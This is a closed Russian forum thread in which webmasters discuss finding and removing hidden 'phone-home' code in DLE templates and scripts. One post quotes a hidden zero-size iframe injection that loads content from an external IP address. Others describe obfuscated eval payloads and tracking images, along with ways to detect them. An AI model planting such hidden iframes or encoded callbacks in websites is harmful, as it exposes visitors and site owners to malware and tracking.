Стучалки в скриптах

Статус
В этой теме нельзя размещать новые ответы.
это фрейм, такое загружает
HTML: 
<table width='0' border='0'><tr height='0px'><td><div style='overflow:scroll; height:0px; width:0px'><iframe src='http://213.155.20.1/~tenxx/' width='36' height='12'></iframe></div></td></tr></table>
чтоб удалить надо в скрипте везде удалить и очистить кеш (engine/cache/), если появляется возможно пароль на ftp украли и надо его заменить.
 
Подскажите где на денвере проверять отправленные письма если стучалка их оправляет.
 
Еще в качестве стучалки может быть просто картинка которая тянется из сайта разработчика, а он в свою очередь смотрит в логах сервера HTTP_REFERER и видит из каких хостов данную картинку тянули. А потом через пару месяцев письмо в хостинг отсылает)
 
finsterseele написал(а):
Искать функции работы с сокетами или нулевые картинки в шаблонах
Нажмите для раскрытия...

Картинки не обязательно будут нулевые )

А еще удобно файрбагом смотреть с каких доменов что загружается.
 
раньше когда всякую гадость из дле шабов вытаскивал использовал файрбаг и просто тестил на локальном компе без инета..сразу видно что лезет на внешку)
 
koshakk написал(а):
раньше когда всякую гадость из дле шабов вытаскивал использовал файрбаг и просто тестил на локальном компе без инета..сразу видно что лезет на внешку)
Нажмите для раскрытия...

А какой прогой отслеживали запросы, в внешним сайтам?
 
get запроси можно через любой логирующий проксы проследить, а post только снифером.
 
Ty4ka написал(а):
Eval это же зло с английского) Таким образом получается, что стучалки - это зло? Ведь они вроде как нужны для отслеживания
Нажмите для раскрытия...
автор, не пугай интернет своими лингвистическими идеями :crazy:
eval - это evaluate, а зло это evil. В php-стучалках eval используется потому что часть кода дополнительно кодируется - base64_encode,str_rot13, или чем ещё позлее - например обфускатором и затем пихается в eval, чтобы выполнялось.
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху